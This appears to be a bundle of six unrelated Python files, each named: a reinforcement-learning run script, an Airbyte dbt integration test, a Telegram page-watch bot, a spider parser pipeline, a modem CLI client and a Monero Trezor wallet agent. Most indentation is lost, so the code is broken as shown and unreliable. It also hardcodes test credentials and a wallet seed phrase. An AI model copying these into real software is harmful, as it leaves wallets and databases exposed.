# TF_CPP_MIN_LOG_LEVEL: 1 hides info messages, 2 hides info and warnings, 3 hides info, warnings and errors
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'
class KPRUN(object):
def __init__(self):
        # SCHEDULE parameters
        # N_WORKER: number of worker agents, default: 4
        # EP_LEN: steps each agent collects before an update, default: 500
        # EP_MAX: maximum number of training episodes (summed over all agents), default: 4000
        # ENV_SEED: random seed, default: np.random.randint(5)
        # ENV_FLOOR: starting floor, default: 0
        # LESSON_END: floor at which the lesson (curriculum) ends, default: 5
self.SCHEDULE = pc_parameters.SCHEDULE(N_WORKER=4,
EP_MAX=40000,
LESSON_END=0)
self.PARAMETERS = pc_parameters.PARAMETERS()
self.MODEL = ex_dppo_model.DPPOMODEL(GLOBAL_SHARE=self,
PARAMETERS=self.PARAMETERS,
SCHEDULE=self.SCHEDULE)
        # Resources shared across workers
self.UPDATE_COUNTER = 0
self.REWARD_AVERAGE = []
self.EP = 0
self.QUEUE = queue.Queue()
self.COORD = tf.train.Coordinator()
        # Create threading events for worker coordination
self.UPDATE_EVENT = threading.Event()
self.ROLLING_EVENT = threading.Event()
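        # UPDATE_EVENT presumably wakes the model-update thread; ROLLING_EVENT lets workers keep collecting rollouts (see train())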
def train(self):
self.UPDATE_EVENT.clear()
self.ROLLING_EVENT.set()
self.MODEL.load()
        # Create the worker objects
workers = [dppo_worker.Worker(GLOBAL_SHARE=self,
PARAMETERS=self.PARAMETERS,
SCHEDULE=self.SCHEDULE,
wid=i,
retro=False,
realtime_mode=False,
) for i in range(self.SCHEDULE.N_WORKER)]
        # Start the worker threads
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start() # training
threads.append(t)
        # Create the thread that updates the model
threads.append(threading.Thread(target=self.MODEL.update, ))
threads[-1].start()
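        # Wait for all worker threads and the updater thread to finish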
self.COORD.join(threads)
        # Save the model
self.MODEL.save()
        # Run a test episode
self.testing()
def grading(self, env):
done = False
reward = 0.0
env.seed(np.random.randint(100))
obs = env.reset()
previous_preprocessed_observation_image = obs[0]
while not done:
action = env.action_space.sample(
previous_preprocessed_observation_image)
observation, reward, done, info = env.step(action)
            # Preprocess the data needed by the model
observation_image, keys, time_remaining = observation
previous_preprocessed_observation_image = observation_image
env.reset()
return reward
def testing(self):
from keepitpossible.common import action_table
self.table_action = action_table.create_action_table()
self.MODEL.load()
done = False
reward = 0.0
env = ObstacleTowerEnv(environment_filename=self.SCHEDULE.ENV_PATH,
worker_id=self.SCHEDULE.N_WORKER + 1,
retro=False,
realtime_mode=True)
obs = env.reset()
previous_preprocessed_observation_image = obs[0]
while not done:
action = self.MODEL.choose_action(
previous_preprocessed_observation_image)
            # Take the action and get the observation, reward, done flag and agent info
for _ in self.table_action[int(action)]:
observation, reward, done, info = env.step(_)
print(
"Action_Chose: ",
action,
"Action: ",
_,
" Reward: ",
reward)
if done:
break
            # Preprocess the data needed by the model
observation_image, keys, time_remaining = observation
preprocessed_observation_image = observation_image
previous_preprocessed_observation_image = preprocessed_observation_image
env.close()
if __name__ == '__main__':
kp_run = KPRUN()
kp_run.testing()
|
dbt_integration_test.py
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import os
import random
import re
import shutil
import socket
import string
import subprocess
import sys
import threading
import time
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = ["postgres", "mysql"]
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def setup_db(self):
self.setup_postgres_db()
self.setup_mysql_db()
def setup_postgres_db(self):
print("Starting localhost postgres container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"postgres",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
print("Starting localhost mysql container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
        Find an unused localhost port for a test database container to listen on
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
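        # Binding to port 0 lets the OS pick an unused ephemeral port; close it right away and reuse the number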
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_project_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
config_generator = TransformConfig()
project_yaml = config_generator.transform_dbt_project(destination_type)
config_generator.write_yaml_config(test_root_dir, project_yaml, "dbt_project.yml")
return project_yaml
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
        Each destination requires different connection settings. This step generates the appropriate profiles.yml,
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
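            # Feed the message file to the destination's stdin from a separate thread while this thread drains its stdout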
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
def dbt_run(self, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command("debug", test_root_dir)
assert self.run_check_dbt_command("deps", test_root_dir)
final_sql_files = os.path.join(test_root_dir, "final")
shutil.rmtree(final_sql_files, ignore_errors=True)
        # Compile dbt model files into the destination SQL dialect, then run the transformation queries
assert self.run_check_dbt_command("run", test_root_dir)
@staticmethod
def run_check_dbt_command(command: str, cwd: str) -> bool:
"""
        Run the dbt subprocess while checking for and counting "ERROR", "FAIL" or "WARNING" lines printed in its output
"""
error_count = 0
commands = [
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/final:/build/run/airbyte_utils/models/generated",
"-v",
"/tmp:/tmp",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
"airbyte/normalization:dev",
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
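        # Stream the source file line by line, applying each substitution rule in order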
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
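    # Example usage (hypothetical paths/pattern), replacing a schema placeholder while copying a template:
    #   DbtIntegrationTest.copy_replace("dbt_project.tmpl.yml", "dbt_project.yml",
    #                                   pattern="__SCHEMA__", replace_value="test_normalization")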
|
webpage_check.py
|
from telegram.ext import Updater, CommandHandler
import threading
import requests
import logging
import time
logging.basicConfig(level=logging.INFO)
token = ""
target_url = ""
chat_ids = set()
updater = Updater(token)
def page_updated():
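    # Poll target_url at a fixed interval and notify every subscribed chat when the page content changes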
interval = 5
older = requests.get(target_url).text
while True:
if len(chat_ids) > 0:
page_data = requests.get(target_url).text
if page_data != older:
older = page_data
for chat_id in chat_ids:
updater.bot.send_message(chat_id=chat_id, text="Pagina aggiornata!")
time.sleep(interval)
def start(update, context):
chat_id = update.effective_chat.id
chat_ids.add(chat_id)
logging.info("{}: start".format(chat_id))
def end(update, context):
chat_id = update.effective_chat.id
chat_ids.remove(chat_id)
logging.info("{}: stop".format(chat_id))
def main():
updater.dispatcher.add_handler(CommandHandler("start", start))
updater.dispatcher.add_handler(CommandHandler("end", end))
threading.Thread(target=page_updated).start()
updater.start_polling()
updater.idle()
if __name__ == "__main__":
main()
|
parser_pipeline.py
|
import logging
import multiprocessing
PARSER_PROCESS_JOIN_TIMEOUT = 3
logger = logging.getLogger('grab.spider.parser_pipeline')
class ParserPipeline(object):
def __init__(self, bot, mp_mode, pool_size, shutdown_event,
network_result_queue, parser_result_queue,
requests_per_process):
self.bot = bot
self.mp_mode = mp_mode
if not self.mp_mode:
self.pool_size = 1
else:
if pool_size is not None:
self.pool_size = pool_size
else:
self.pool_size = multiprocessing.cpu_count()
self.shutdown_event = shutdown_event
self.network_result_queue = network_result_queue
self.parser_result_queue = parser_result_queue
self.requests_per_process = requests_per_process
self.parser_pool = []
for x in range(self.pool_size):
is_parser_idle, proc = self.start_parser_process()
self.parser_pool.append({
'is_parser_idle': is_parser_idle,
'proc': proc,
})
def start_parser_process(self):
if self.mp_mode:
from multiprocessing import Process, Event
else:
from multiprocessing.dummy import Process, Event
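            # multiprocessing.dummy exposes the same API but is backed by threads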
is_parser_idle = Event()
if self.mp_mode:
bot = self.bot.__class__(
network_result_queue=self.network_result_queue,
parser_result_queue=self.parser_result_queue,
is_parser_idle=is_parser_idle,
shutdown_event=self.shutdown_event,
parser_requests_per_process=self.requests_per_process,
parser_mode=True,
meta=self.bot.meta)
else:
            # In non-multiprocess mode we start the `run_parser`
            # method in a pseudo-process (actually a thread).
            # Because the main spider instance itself runs `run_parser`,
            # all changes made in handlers are applied to the main
            # spider instance, which allows us to support deprecated
            # spiders that do not know about the multiprocessing mode
bot = self.bot
bot.network_result_queue = self.network_result_queue
bot.parser_result_queue = self.parser_result_queue
bot.is_parser_idle = is_parser_idle
bot.shutdown_event = self.shutdown_event
            bot.parser_requests_per_process = self.requests_per_process
bot.meta = self.bot.meta
proc = Process(target=bot.run_parser)
if not self.mp_mode:
proc.daemon = True
proc.start()
return is_parser_idle, proc
def check_pool_health(self):
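        # Replace any parser process that has died so the pool keeps its configured size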
for proc in self.parser_pool:
if not proc['proc'].is_alive():
self.bot.stat.inc('parser-pipeline-restore')
                logger.debug('Restoring dead parser process')
is_parser_idle, new_proc = self.start_parser_process()
self.parser_pool.append({
'is_parser_idle': is_parser_idle,
'proc': new_proc,
})
self.parser_pool.remove(proc)
def shutdown(self):
for proc in self.parser_pool:
if self.mp_mode:
pname = proc['proc'].pid
else:
pname = proc['proc'].name
logger.debug('Started shutdown of parser process: %s' % pname)
proc['proc'].join(
PARSER_PROCESS_JOIN_TIMEOUT)
if proc['proc'].is_alive():
if self.mp_mode:
print('Process %s does not respond. Finish him!' % pname)
proc['proc'].terminate()
else:
# do nothing, because in
# non-mp mode parser threads
# have daemon=True flag
pass
logger.debug('Finished joining parser process: %s' % pname)
|
cli_shell.py
|
from cmd import Cmd
import socket
import logging
import threading
import time
import signal
import select
import sys
argi = len(sys.argv) - 1
assert(argi == 2)
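# expects two arguments: the CLI server address and port
# the socket below is created and closed immediately, apparently just so the
# global `sock` exists before the RX thread opens the real connection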
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.close()
exit_now = False
ip_connection_ok = False
address = sys.argv[1] #'127.0.0.1'
port = int(sys.argv[2]) #50008
def print_rx_data_thread():
global sock
global exit_now
global address
global port
global ip_connection_ok
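    # Receive loop: while connected, read and echo incoming data; otherwise keep retrying the connection until exit_now is set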
while not exit_now:
if ip_connection_ok:
ready = select.select([sock], [], [], 0.1)
if ready[0]:
try:
data = sock.recv(1024)
if not data:
print('Empty data. closing client.')
sock.close()
ip_connection_ok = False
else:
out = '%s$> ' % data
sys.stdout.write(out)
sys.stdout.flush()
except Exception as e:
print("recv failed. Exception is %s" % e)
ip_connection_ok = False
sock.close()
else:
try:
print("\r\nTry to connect to %s:%d" % (address, port))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((address, port))
ip_connection_ok = True
print("Connection to %s:%d is Ok" % (address, port))
except Exception as e:
ip_connection_ok = False
i = 0
while i < 20:
if exit_now:
print("\r\nRX data thread break")
sys.stdout.flush()
break
i += 1
time.sleep(0.1)
exit_now = True
if ip_connection_ok:
ip_connection_ok = False
sock.close()
print("\r\nRX data thread exit")
sys.stdout.flush()
def CliSendIp(id, cmd, args, input):
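    # Wrap the command in a simple tag-like request string and send it to the CLI server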
if ip_connection_ok:
buff = '<id="0x%x" name="%s" arglist="%s" args="%s">' % (id, cmd, args, input)
sock.send(buff.format().strip('\n').strip(' '))
else:
print("cli server not connected")
class CliShellPrompt(Cmd):
prompt = '$> '
intro = "Welcome! Type ? or press tab to list commands"
def emptyline(self):
return False
def do_exit(self, inp):
global exit_now
global ip_connection_ok
exit_now = True
task.join()
if ip_connection_ok:
ip_connection_ok = False
sock.close()
print("Cli exit")
return True
def do_modem_status(self, inp):
CliSendIp(0x0b5151cd, "modem_status", "", "{}".format(inp))
def do_modem_com_enable_async_rx_print(self, inp):
CliSendIp(0x0bb8a2a1, "modem_com_enable_async_rx_print", "", "{}".format(inp))
def do_modem_com_disable_async_rx_print(self, inp):
CliSendIp(0x151b0c4d, "modem_com_disable_async_rx_print", "", "{}".format(inp))
def do_log_list_loggers(self, inp):
CliSendIp(0x170aa9d3, "log_list_loggers", "", "{}".format(inp))
def do_modem_com_read_rx_data(self, inp):
CliSendIp(0x276df8fd, "modem_com_read_rx_data", "", "{}".format(inp))
def do_modem_hw_reset(self, inp):
CliSendIp(0x2b17a495, "modem_hw_reset", "", "{}".format(inp))
def do_modem_sms_delete(self, inp):
CliSendIp(0x3598398c, "modem_sms_delete", "u:uId", "{}".format(inp))
def do_log_status(self, inp):
CliSendIp(0x362d73ec, "log_status", "", "{}".format(inp))
def do_modem_sms_send(self, inp):
CliSendIp(0x3ff673f2, "modem_sms_send", "s:sNumber s:sData", "{}".format(inp))
def do_modem_hw_power_off(self, inp):
CliSendIp(0x47c38d54, "modem_hw_power_off", "", "{}".format(inp))
def do_modem_sms_status(self, inp):
CliSendIp(0x61d0d0e1, "modem_sms_status", "", "{}".format(inp))
def do_log_set_verbosity(self, inp):
CliSendIp(0x66502d4d, "log_set_verbosity", "s:sVerbosity", "{}".format(inp))
def do_modem_sms_read(self, inp):
CliSendIp(0x7d3537d2, "modem_sms_read", "u:uId", "{}".format(inp))
def do_modem_sms_list(self, inp):
CliSendIp(0x8695ac23, "modem_sms_list", "", "{}".format(inp))
def do_modem_hw_status(self, inp):
CliSendIp(0x98e202f2, "modem_hw_status", "", "{}".format(inp))
def do_modem_call_status(self, inp):
CliSendIp(0xa39e4493, "modem_call_status", "", "{}".format(inp))
def do_modem_call_dial(self, inp):
CliSendIp(0xb868e062, "modem_call_dial", "s:sNumber", "{}".format(inp))
def do_modem_com_write_tx_data(self, inp):
CliSendIp(0xd0b1b299, "modem_com_write_tx_data", "s:sPort s:sData", "{}".format(inp))
def do_cli_ping(self, inp):
CliSendIp(0xd26fa6b4, "cli_ping", "", "{}".format(inp))
def do_modem_call_hang(self, inp):
CliSendIp(0xd3f2c3c1, "modem_call_hang", "", "{}".format(inp))
def do_modem_hw_power_on(self, inp):
CliSendIp(0xdddb4f3b, "modem_hw_power_on", "", "{}".format(inp))
def default(self, inp):
print('Invalid command <%s>\r\n%s' % ("{}".format(inp), self.prompt))
do_EOF = do_exit
if __name__ == '__main__':
def signal_handler(sig, frame):
global exit_now
exit_now = True
signal.signal(signal.SIGINT, signal_handler)
task = threading.Thread(target=print_rx_data_thread)
task.start()
time.sleep(0.1)
CliShellPrompt().cmdloop()
|
agent.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Dusan Klinec, ph4r05, 2018
#
# Note: pickling is used for message serialization.
# This is just for prototyping & a fast PoC; pickling won't be used in production.
# Instead, protobuf messages will be defined and parsed to avoid malicious pickling.
#
import argparse
import asyncio
import binascii
import datetime
import json
import logging
import os
import re
import sys
import threading
import time
from monero_glue.agent import agent_lite, agent_misc
from monero_glue.agent.agent_lite import SignAuxData
from monero_glue.messages import DebugMoneroDiagRequest, Entropy, GetEntropy
from monero_glue.xmr import common, crypto, daemon_rpc, monero, wallet, wallet_rpc
from monero_glue.xmr.common import try_fnc
from monero_glue.xmr.enc import chacha, chacha_poly
from monero_glue.xmr.sub import addr as xmr_addr
from monero_poc.utils import cli, misc, trace_logger
from monero_poc.utils.misc import TrezorAddressMismatchError
from monero_poc.utils.trezor_server_proxy import TokenProxy
from monero_serialize import xmrboost, xmrserialize, xmrtypes
from trezorlib import debuglink, device
import coloredlogs
from cmd2 import Cmd
logger = logging.getLogger(__name__)
coloredlogs.CHROOT_FILES = []
coloredlogs.install(level=logging.WARNING, use_chroot=False)
class HostAgent(cli.BaseCli):
"""
Host agent wrapper
"""
prompt = "$> "
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.args = None
self.network_type = None
self.address = None
self.address_info = None # type: xmr_addr.AddrInfo
self.address_base_info = None # type: xmr_addr.AddrInfo
self.priv_view = None
self.pub_view = None
self.pub_spend = None
self.network_type = None
self.account_idx = 0 # major sub-address index
self.wallet_salt = None
self.wallet_password = b""
self.wallet_file = None
self.monero_bin = None
self.rpc_addr = "127.0.0.1:18081"
self.rpc_passwd = None
self.rpc_bind_port = 48084
self.rpc_running = False
self.rpc_ready = False
self.trace_logger = trace_logger.Tracelogger(logger)
self.loop = asyncio.get_event_loop()
self.worker_loop = asyncio.new_event_loop()
self.worker_thread = threading.Thread(
target=self.looper, args=(self.worker_loop,)
)
self.worker_thread.setDaemon(True)
self.worker_thread.start()
self.wallet_thread = None
self.terminating = False
self.trezor_proxy = None # type: TokenProxy
self.agent = None # type: agent_lite.Agent
self.token_debug = False
self.token_path = None
self.fresh_wallet = False
self.wallet_proxy = wallet_rpc.WalletRpc(
self, self.rpc_bind_port, self.rpc_passwd
)
self.daemon_rpc = daemon_rpc.DaemonRpc()
self.wallet_obj = wallet.Wallet(self.daemon_rpc)
def looper(self, loop):
"""
Main looper
:param loop:
:return:
"""
asyncio.set_event_loop(loop)
loop.run_forever()
def submit_coro(self, coro):
"""
        Submits a coroutine to the worker loop
        :param coro:
:return:
"""
return asyncio.run_coroutine_threadsafe(coro, self.worker_loop)
def wait_coro(self, coro):
"""
        Runs a coroutine and waits for its result
        :param coro:
:return:
"""
future = self.submit_coro(coro)
return future.result()
#
# CLI
#
def update_intro(self):
"""
        Updates the intro text for the CLI header banner.
:return:
"""
self.intro = (
"-" * self.get_term_width()
+ "\n Monero Trezor agent\n"
+ "\n"
+ "-" * self.get_term_width()
)
def update_prompt(self):
"""
Prompt update
:return:
"""
flags = []
if not self.rpc_running:
flags.append("R!")
if not self.rpc_ready:
flags.append("Loading" if not self.fresh_wallet else "Syncing")
flags_str = "|".join(flags)
flags_suffix = "|" + flags_str if len(flags_str) > 0 else ""
self.prompt = "[wallet %s%s]: " % (
self.address[:6].decode("ascii") if self.address else "",
flags_suffix,
)
def token_cmd(self, coro):
try:
res = self.wait_coro(coro)
return res
except Exception as e:
print("Trezor error (e: %s)" % e)
self.trace_logger.log(e)
raise e
#
# Handlers
#
def check_rpc(self):
try_debug = None
if not self.args.debug_rpc:
try_debug = (
"Consider running with --debug-rpc flag to show RPC wallet "
"output for closer inspection and diagnosis"
)
if not self.rpc_running:
self.perror("Monero RPC wallet is not running.")
if try_debug:
self.poutput(try_debug)
return False
elif not self.rpc_ready:
self.perror("Monero RPC wallet is not yet ready, please wait a moment")
self.poutput(
"RPC wallet is not available during the blockchain scanning, it may take a while"
)
if try_debug:
self.poutput(try_debug)
return False
return True
def check_address(self):
pres = self.token_cmd(self.agent.get_address(account=self.account_idx))
if self.address != pres.address:
self.perror("Connected TREZOR address does not match wallet address")
raise TrezorAddressMismatchError()
def do_quit(self, line):
self.terminating = True
return super().do_quit(line)
do_q = do_quit
do_Q = do_quit
# def do_account(self, line):
# self.set_account(int(line))
def do_address(self, line):
print(self.address.decode("ascii"))
def do_ping(self, line):
pres = self.token_cmd(self.trezor_proxy.ping())
if pres:
print("OK %s" % pres)
def do_check_trezor(self, line):
self.check_address()
self.poutput("OK")
def do_state(self, line):
if not self.rpc_running:
self.perror("RPC wallet is not running")
else:
self.poutput("RPC wallet: running")
if self.rpc_ready:
self.poutput("RPC wallet: ready")
elif self.fresh_wallet:
self.poutput("RPC wallet: synchronising")
else:
self.poutput("RPC wallet: starting")
def do_get_watch_only(self, line):
pres = self.token_cmd(self.agent.get_watch_only())
print("View key: %s" % binascii.hexlify(pres.watch_key).decode("utf8"))
print("Address: %s" % pres.address.decode("utf8"))
def do_get_address(self, line):
pres = self.token_cmd(self.agent.get_address(account=self.account_idx))
print("Address: %s" % pres.address.decode("utf8"))
def do_balance(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.balance()
print("Balance: %.5f" % wallet.conv_disp_amount(res["result"]["balance"]))
print(
"Unlocked Balance: %.5f"
% wallet.conv_disp_amount(res["result"]["unlocked_balance"])
)
def do_height(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.height()
print("Height: %s" % res["result"]["height"])
def do_get_transfers(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.get_transfers({"pool": True, "in": True, "out": True})
print(json.dumps(res, indent=2))
def do_rescan_bc(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.rescan_bc()
print(json.dumps(res, indent=2))
def do_key_image_sync(self, line):
if not self.check_rpc():
return
self.check_address()
self.wait_coro(self.key_image_sync(line))
def do_refresh(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.refresh()
print(json.dumps(res, indent=2))
def do_transfer(self, line):
if not self.check_rpc():
return
self.check_address()
if len(line) == 0:
            print(
                "Usage: transfer [<priority>] [<ring_size>] <address> <amount> [<payment_id>]"
            )
            return
parts = [x for x in line.split(" ") if len(x.strip()) > 0]
res = misc.parse_transfer_cmd(parts)
return self.transfer_cmd(res)
def do_sweep_dust(self, line):
if not self.check_rpc():
return
res = self.wallet_proxy.sweep_dust({"do_not_relay": True})
if "result" not in res:
logger.error("Sweep dust error: %s" % res)
raise ValueError("Could not transfer")
result = res["result"]
unsigned = binascii.unhexlify(result["unsigned_txset"])
self.wait_coro(self.sign_unsigned(unsigned))
def do_sweep_all(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_all [index=<N1>[,<N2>,...]] [<priority>] [<ring_size>] <address> [<payment_id>]"
)
return
params = misc.parse_sweep_all(line)
self.sweep_cmd(params, is_all=True)
def do_sweep_below(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_below <amount_threshold> [index=<N1>[,<N2>,...]] [<priority>] [<ring_size>] <address> [<payment_id>]"
)
return
params = misc.parse_sweep_below(line)
self.sweep_cmd(params, is_below=True)
def do_sweep_single(self, line):
if not self.check_rpc():
return
if len(line) == 0:
self.poutput(
"sweep_single [<priority>] [<ring_size>] <key_image> <address> [<payment_id>]"
)
return
params = misc.parse_sweep_below(line)
self.sweep_cmd(params, is_single=True)
def do_sign(self, line):
if not self.check_rpc():
return
self.check_address()
self.wait_coro(self.sign_wrap(line))
def do_init(self, line):
mnemonic12 = "alcohol woman abuse must during monitor noble actual mixed trade anger aisle"
mnemonic24 = "permit universe parent weapon amused modify essay borrow tobacco budget walnut lunch consider gallery ride amazing frog forget treat market chapter velvet useless topple"
init_mode = 0 if len(line) == 0 else int(line)
mnemonic = mnemonic12 if len(line) == 0 or int(line) == 0 else mnemonic24
print(self.trezor_proxy.client)
device.wipe(self.trezor_proxy.client)
debuglink.load_device_by_mnemonic(
client=self.trezor_proxy.client,
mnemonic=mnemonic,
pin="1234" if init_mode >= 2 else "",
passphrase_protection=init_mode >= 3,
label="ph4test",
language="english",
)
def do_get_entropy(self, line):
parts = line.split(" ")
size = int(parts[0])
path = parts[1]
self.wait_coro(self.get_entropy(size, path))
def do_tdeb(self, line):
is_deb = bool(int(line))
print("Token debug set to: %s" % is_deb)
self.token_debug = is_deb
def do_switch(self, line):
line = line.strip()
path = "bridge:web01"
if line == "udp":
path = "udp:127.0.0.1:21324"
elif ":" in line:
path = line
elif len(line) == 0:
path = self.choose_trezor()
if "bridge" in path:
self.token_debug = False
print("Switching to device: %s" % path)
self.token_path = path
self.wait_coro(self.connect(path))
def do_reconnect(self, line):
self.wait_coro(self.connect(self.token_path))
def do_enumerate(self, line):
from monero_glue.trezor import manager as tmanager
r = tmanager.Trezor.enumerate()
for x in r:
print(x)
def do_diag(self, line):
m = re.match(r"^\s*(\d+)(?:(\s+\d+)(?:(\s+\d+)([\s\d]+))?)?\s*$", line.strip())
if m is None:
print("Usage: diag INS [p1 [p2 [ints...]]")
return
diag_code = int(m.group(1))
p1 = int(m.group(2)) if m.group(2) else None
p2 = int(m.group(3)) if m.group(3) else None
ints = [int(x) for x in re.sub(r"\s{2,}", " ", m.group(4).strip()).split(" ")] if m.group(4) else None
print("Diagnosis: %d p1: %s p2: %s params: %s" % (diag_code, p1, p2, ints))
